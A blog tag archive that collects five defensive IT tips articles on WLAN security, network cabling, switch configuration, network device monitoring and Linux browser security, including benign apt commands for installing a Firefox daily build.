Tag Archives: Tips

Hacker’s Share Tips on How to Better Secure Corporate WLANs | IT Infrastructure Advice, Discussion, Community


Once upon a time, Wi-Fi security was considered notoriously weak. Wireless encryption mechanisms including WEP, Cisco LEAP, and WPA1 were proven to be nothing more than minor speedbumps for bad actors that wanted to break in. Yet, ever since WPA2 with AES encryption burst onto the scene, opinions on Wi-Fi security have changed.

Most now consider WPA2 protected Wi-Fi to be as secure (if not more-so) than a wired connection. But this is only a part of the overall Wi-Fi security battle. While I was attending DEF CON 27 earlier this month, I was frequently made aware of this fact. When I asked multiple attendees and wireless security pros working the conference for tips on how corporate LANs can be better secured, most never even mentioned an encryption type as most likely assumed WPA2 would be in use. Instead, answers focused on other security factors that WLAN administrators commonly overlook or ignore. Factors that make wireless networks less secure than they should be. Here are what top wireless hackers say are the most overlooked ways you can better secure your corporate WLAN.

If you’re going to use pre-shared keys, make them complex and change them regularly

WPA2 comes in two forms. One is known as WPA2 Enterprise and it leverages IEEE 802.1X to authenticate users that are assigned username and a password only they know. The second type of WPA2 is called WPA2 Personal. This authenticates users or devices using a pre-shared key (PSK). While this is not nearly as secure as WPA2 Enterprise from an authentication perspective, it’s sometimes a necessary evil. This is especially true when you must connect cheap IoT devices that cannot use WPA2 Enterprise authentication.

That said, if it’s properly managed, WPA2 Personal can still be considered secure. The biggest risk, however, is that IT departments neglect to change the PSK on a regular basis. It’s not uncommon for a PSK to be used for months or years. Over time, the PSK inevitably gets into the wrong hands. Thus, it’s possible that the bad guys could stumble across your shared key and easily connect without you ever knowing it.

Another PSK tip is to make the password as complex as possible. It’s important to know that even AES encryption can be cracked if given enough time. The amount of time required to hack a PSK, however, depends greatly on the complexity of the password used. The longer and more random your PSK is, the more time it will take to crack.

Penetration testing of guest Wi-Fi access

You may think you’ve properly configured access controls that only grant the ability for guest Wi-Fi users to access the internet and perhaps a handful of internal resources. Yet mistakes are often made that potentially expose far more of the internal corporate network than was thought. Even a rudimentary penetration test of what guest users can and cannot access proves that your access control lists (ACLs) were indeed configured correctly.

Take advantage of built-in Wi-Fi security tools

Most enterprise-grade WLAN hardware and software these days comes with a slew of security tools that can be used to scan the wireless environment and baseline/detect security anomalies. This includes the identification of rogue access points, suspicious clients or other malicious behaviors meant to scan or overwhelm your WLAN. While these tools are largely available, they are commonly not used on a regular basis as they were intended. Learning how to take advantage of these already existing security tools can help prevent wireless security breaches or outages both small and large.

Device authentication using certificates

As mentioned, most enterprise-grade Wi-Fi uses WPA2 Enterprise for end-user authentication. While considered very secure, sometimes a second form of authentication is deemed necessary. A different authentication method identifies and validates that a specific end device – as opposed to a user – can connect. One way of accomplishing this is to implement a certificate-based authentication mechanism such as EAP-TLS. Without getting overly technical, EAP-TLS works by installing certificates on client devices and authentication servers. Both the clients and servers use these certificates to validate the identity of the other. Doing so allows administrators the ability to only allow access to certain Wi-Fi networks that have the client-side certificate installed. In other words, it prevents rogue devices from connecting to a sensitive corporate network – a major problem common with companies that condone overly loose BYOD policies.

Wi-Fi security is only as good as the person that implements it

Generally speaking, the technical aspects of Wi-Fi security are in good shape. For example, we’ve been talking about WPA2 security without mentioning that its successor – WPA3 – already exists and is (almost) ready to go. That said, the biggest threat to corporate WLAN security according to hackers at DEF CON isn’t a technical one. Rather, the biggest risks are found in those that are responsible for the configuration and ongoing management of said WLAN. Thus, it may be well worth the time and effort to review configuration, monitoring, auditing, and other processes to ensure your corporate WLAN is as secure as you want it to be.



Source link

Cabling Trials and Tribulations: Tips on Avoiding Problems | IT Infrastructure Advice, Discussion, Community


I’ve been involved in quite a few engagements that require new cabling. When I’m allowed, and it is a small job, I do it myself since its quicker. Lately, I’ve had to rely on cabling companies and been reminded of how things can go horribly wrong.  In this article, I will outline what I’ve run into with the hopes that you will be prepared for your next cabling run. About 90 percent of the time the cabling companies do a great job, but every so often things go wrong.

Preparation is everything

I make sure I have drawings, specific instructions, photos, labels, and anything else that will make the cabling run as straightforward as possible. In most cases, I meet with the installers to walk them through what I need and ask for an ETA. I explain that I want to ensure that all cabling, patch panels, and everything else are labeled and accompanying documentation is provided. I also ask that we meet again after the work is completed to ensure all is well before and any documentation is delivered before I sign off on the work.

So here’s some of the odd ball stuff I’ve run into:

Electrical tape as a labelling technique: I’ve had three companies use electrical tape to identify new cable runs. Not sure what happened to good old cable labels. I went back and put proper labels on everything after they left and then documented accordingly.

Short runs: And I’m not talking about little to no slack. I’ve had two companies run cable that was 3 to 4 feet too short. When I showed one of the cabling companies that it was too short, they gave me some Ethernet female to female couplers and suggested I use a longer patch cable to make up the difference.

Connectors: I had an installation company literally pull and leave the cabling unterminated. When I asked when they would have the cabling terminated, the reply, “That’s extra.”

Outdoor cabling: One company used indoor cabling outside. When I explained that there’s outdoor grade cabling and asked why they used indoor cabling outside, they said, “Outdoor cabling is not required since the cabling is up against the building and protected.” Yikes!

Grounding: If your installer does not know the concepts of grounding and when it’s required, call someone else.

CAT5 vs. CAT6 vs. CAT7: I had a few companies install CAT5 and CAT6 when CAT7 was specifically ordered. One admitted that they used CAT5 since they have a lot of in stock.

The moral of the story is that you, or have someone you designate, go back to check on the installation. In this video, I show you one of the short runs I ran into. In this case, I was able to cut the tie wraps, reroute the cabling, and mount the equipment at the top of the rack to make it work.

 



Source link

Best Practices, Tips, and Tricks to Switch Configuration | IT Infrastructure Advice, Discussion, Community


I’m working on a new network design for a remote location and thought I would share some of my best practices, tips and tricks.

In this article I will assume the general design has been sorted out and will go to the configuration phase.

In some large companies, this step can be very simple. You get an IP address and password configured.  After the switch is installed and powered on, the network staff can remote in and ‘push’ the final configuration to the switch. In this case, I do not have that option.

My checklist of items to configure will be based on the client design documentation. Here’s a quick list of items to cover: DHCP, routing, VLANs, Spanning Tree, passwords, backups/upgrades, access lists, interface descriptions, time servers, authentication details, telnet/SSH, web interface, sys logging, and SNMP. Let’s look at these items in more detail.

DHCP

(Cisco configuration example)

If your switch supports it, I always enable DHCP for the installation since the network connection to the production DHCP server may not be available. In some cases, I create a vendor VLAN, with DHCP that only allows access to specific networks or devices. That way the vendor isn’t always asking for a static IP when on site or guessing and causing a duplicate IP address situation. I’m sure we’ve all seen people invert the default and host IP address.

Routing

If the switch has routing capabilities, it is important to configure the proper default gateway or which specific routing protocols need to be supported. Pay attention to those scenarios where you may have two or more default routes since every vendor treats this differently. Some round robin between destination IP address, or treat it as a fail over, or load balance based on all sorts of options. In this case, the client specified a static route to a single destination, easy.

VLANS

(Cisco configuration example)

Typically you will have two VLANS: admin and clients. Or in some cases three VLANS: admin, clients, and VOIP. It is very important to figure out as much of this in advance for your IP subnetting design. In most cases, contiguous IP subnets are preferred. Don’t forget to put descriptions on your VLAN interfaces, if your device supports it. Deciding on your VLAN tagging configuration also falls into this category.

Spanning tree

Spanning tree, rapid spanning tree, or the many other names that cover this same protocol is always significant. This also include specific items such as BODU blocking and manually configuring Priority values. In some specific cases, I disabled spanning tree but refer to your design document.

Passwords

Figure out your password naming convention, how often it will change, and if you must include any authentication servers like Radius TACAS+. You should check your equipment manual to see if your device supports some advanced features like incorrect login lockouts/accounting/alerts.

Backups/updates

I always keep the base configuration on the device and a USB key while installing in case I need to revert back to the original configuration. You need to consider how often you will back up device configurations. There are many options, from manually backing up configurations, to scripts and finally applications that will back up whenever changes are made.  I have written quite a few scripts for clients that did not have a solution in place to perform a weekly backup. Don’t forget about backing up your firmware, IOS, and equipment software.  It is quite common to discover the device needs updates even though you just received it.

Access lists or filters

 This covers device to protocol access. Device access is how you connect to the device with physical ports like Ethernet, Serial, USB, and others. I am not a fan of leaving physical ports without passwords unless the client specifically requests it. If you device has various ‘levels of access’ avoid using the same password. If you are going to create multiple user accounts, try to do it by job function or department like WAN, WiFI, Voice, and others.

Then there is other forms of access like HTTP/HTTPS, Telnet/SSH, API’s, and vendor specific applications/protocols. Protocol access involves allowing access to specific protocols, IP addresses, or IP subnets.  Depending on your product, this might cover such items such as telnet, SNMP, RMON, Netflow, HTTP/HTTPS, and others. During the installation I believe it is critical to monitor new equipment and ensure all is well. In some cases we might enable SNMP for a while until the equipment is added to the corporate monitoring system.

Interface descriptions

(Cisco configuration example)

I can’t stress enough how important descriptions are for ALL devices when possible. Device such as switches, routers, and firewalls may be in secured locations or offsite so knowing what is connected to speeds up troubleshooting. Do not solely rely on vendor discovery protocols since they may not be compatible with all equipment and you never know what devices will send them out. In specific scenarios, I actually disable discovery protocols from untrusted or public ports or networks since a lot of important information is being sent out all ports in clear text.

Sys logging, time servers and SNMP

This also covers other monitoring protocols Netflow, RMON, and more. The point here is to decide what the addresses and credentials are of these devices in your environment and ensure the relevant protocols work before walking away.

All these points should be confirmed and reviewed during support and configuration changes.



Source link

Four Tips to Worsen Your Network Security | IT Infrastructure Advice, Discussion, Community


If you want to keep your network infrastructure secured, you need to monitor what’s going on with routers, switches, and other network devices. Such visibility would enable you to quickly detect and investigate threats to perimeter security, such as unauthorized changes to configurations, suspicious logon attempts, and scanning threats. For example, improper changes of network device configurations will leave your network vulnerable to hackers who could break into your network. If you want to strengthen your network security, never follow these four tips.

Tip # 1: Don’t care about unauthorized logons

Most attempts to log on to a network device are valid actions by network administrators — but some are not. Inability to promptly detect suspicious logon attempts leaves your organization vulnerable to attackers. Unusual events include access by an admin outside of business hours or during holidays, failed logon attempts, or the modification of access rights, etc. An immediate alert about suspicious events enables IT personnel to take action before security is compromised. This practice is also helpful for compliance audits, as it gives evidence that privileged users and their activities on your devices are closely watched (e.g., who is logging in and how often).

Tip # 2: Configure your devices at random

The key threat associated with network devices is improper configuration. A single incorrect change can weaken your perimeter security, raise concerns during regulatory audits and even cause costly system outages that can bring your business down. For example, a firewall misconfiguration can give attackers easy access to your network, which could lead to lasting damage. Visibility into who changed what will provide you with insight and control of your network devices. Continuous auditing would enable you to have better user accountability and detect potential security incidents more quickly before they cause real trouble.

Tip # 3: Ignore scanning threats

Hackers often use network scanning to learn about a network’s structure and behavior to execute an attack on the network. If you avoid monitoring of your network devices for scanning threats, you might miss malicious activities until your sensitive data is compromised. To strengthen your protection against scanning threats and minimize the risk of data breaches, ensure continuous monitoring of network devices. Such visibility would enable you to understand which host and subnet were scanned, from which IP address it was initiated, and how many scanning attempts were made.

Tip # 4: Ease control of VPN logons

Virtual private network (VPN) access is a popular way to improve the security of remote connections for many organizations, but there are many security risks associated with it. In reality, VPN connections are usually used by anyone in the organization without any approvals. The best practices recommend providing access to network resources via VPN only after proper approvals and only to users that need access according to their business need. However, practice shows that there are no 100 percent secured VPNs and any VPN connection is a risk. The major risk scenarios include a user connecting via public Wi-Fi (since someone might steal their credentials) or a user who doesn’t usually work with VPN suddenly beginning to use it (which can be a sign that a user has lost their device and someone else is trying to log in using it). Visibility into network devices enables you to keep track of each VPN logon attempt. Such visibility also provides information about who tried to access your network devices, the IP address each authentication attempt was made from, and the cause of each failed VPN logon.



Source link

5 Easy Tips for Linux Web Browser Security | Linux.com


If you use your Linux desktop and never open a web browser, you are a special kind of user. For most of us, however, a web browser has become one of the most-used digital tools on the planet. We work, we play, we get news, we interact, we bank… the number of things we do via a web browser far exceeds what we do in local applications. Because of that, we need to be cognizant of how we work with web browsers, and do so with a nod to security. Why? Because there will always be nefarious sites and people, attempting to steal information. Considering the sensitive nature of the information we send through our web browsers, it should be obvious why security is of utmost importance.

So, what is a user to do? In this article, I’ll offer a few basic tips, for users of all sorts, to help decrease the chances that your data will end up in the hands of the wrong people. I will be demonstrating on the Firefox web browser, but many of these tips cross the application threshold and can be applied to any flavor of web browser.

1. Choose Your Browser Wisely

Although most of these tips apply to most browsers, it is imperative that you select your web browser wisely. One of the more important aspects of browser security is the frequency of updates. New issues are discovered quite frequently and you need to have a web browser that is as up to date as possible. Of major browsers, here is how they rank with updates released in 2017:

  1. Chrome released 8 updates (with Chromium following up with numerous security patches throughout the year).

  2. Firefox released 7 updates.

  3. Edge released 2 updates.

  4. Safari released 1 update (although Apple does release 5-6 security patches yearly).

But even if your browser of choice releases an update every month, if you (as a user) don’t upgrade, that update does you no good. This can be problematic with certain Linux distributions. Although many of the more popular flavors of Linux do a good job of keeping web browsers up to date, others do not. So, it’s crucial that you manually keep on top of browser updates. This might mean your distribution of choice doesn’t include the latest version of your web browser of choice in its standard repository. If that’s the case, you can always manually download the latest version of the browser from the developer’s download page and install from there.

If you like to live on the edge, you can always use a beta or daily build version of your browser. Do note, that using a daily build or beta version does come with it the possibility of unstable software. Say, however, you’re okay with using a daily build of Firefox on a Ubuntu-based distribution. To do that, add the necessary repository with the command:

sudo apt-add-repository ppa:ubuntu-mozilla-daily/ppa

Update apt and install the daily Firefox with the commands:

sudo apt-get update

sudo apt-get install firefox

What’s most important here is to never allow your browser to get far out of date. You want to have the most updated version possible on your desktop. Period. If you fail this one thing, you could be using a browser that is vulnerable to numerous issues.

2. Use A Private Window

Now that you have your browser updated, how do you best make use of it? If you happen to be of the really concerned type, you should consider always using a private window. Why? Private browser windows don’t retain your data: No passwords, no cookies, no cache, no history… nothing. The one caveat to browsing through a private window is that (as you probably expect), every time you go back to a web site, or use a service, you’ll have to re-type any credentials to log in. If you’re serious about browser security, never saving credentials should be your default behavior.

This leads me to a reminder that everyone needs: Make your passwords strong! In fact, at this point in the game, everyone should be using a password manager to store very strong passwords. My password manager of choice is Universal Password Manager.

3. Protect Your Passwords

For some, having to retype those passwords every single time might be too much. So what do you do if you want to protect those passwords, while not having to type them constantly? If you use Firefox, there’s a built-in tool, called Master Password. With this enabled, none of your browser’s saved passwords are accessible, until you correctly type the master password. To set this up, do the following:

  1. Open Firefox.

  2. Click the menu button.

  3. Click Preferences.

  4. In the Preferences window, click Privacy & Security.

  5. In the resulting window, click the checkbox for Use a master password (Figure 1).

  6. When prompted, type and verify your new master password (Figure 2).

  7. Close and reopen Firefox.

4. Know your Extensions

There are plenty of privacy-focused extensions available for most browsers. What extensions you use will depend upon what you want to focus on. For myself, I choose the following extensions for Firefox:

  • Firefox Multi-Account Containers – Allows you to configure certain sites to open in a containerized tab.

  • Facebook Container – Always opens Facebook in a containerized tab (Firefox Multi-Account Containers is required for this).

  • Avast Online Security – Identifies and blocks known phishing sites and displays a website’s security rating (curated by the Avast community of over 400 million users).

  • Mining Blocker – Blocks all CPU-Crypto Miners before they are loaded.

  • PassFF – Integrates with pass (A UNIX password manager) to store credentials safely.

  • Privacy Badger – Automatically learns to block trackers.

  • uBlock Origin – Blocks trackers based on known lists.

Of course, you’ll find plenty more security-focused extensions for:

Not every web browser offers extensions. Some, such as Midoria, offer a limited about of built-in plugins, that can be enabled/disabled (Figure 3). However, you won’t find third-party plugins available for the majority of these lightweight browsers.

5. Virtualize

For those that are concerned about releasing locally stored data to prying eyes, one option would be to only use a browser on a virtual machine. To do this, install the likes of VirtualBox, install a Linux guest, and then run whatever browser you like in the virtual environment. If you then apply the above tips, you can be sure your browsing experience will be safe.

The Truth of the Matter

The truth is, if the machine you are working from is on a network, you’re never going to be 100% safe. However, if you use that web browser intelligently you’ll get more bang out of your security buck and be less prone to having data stolen. The silver lining with Linux is that the chances of getting malicious software installed on your machine is exponentially less than if you were using another platform. Just remember to always use the latest release of your browser, keep your operating system updated, and use caution with the sites you visit.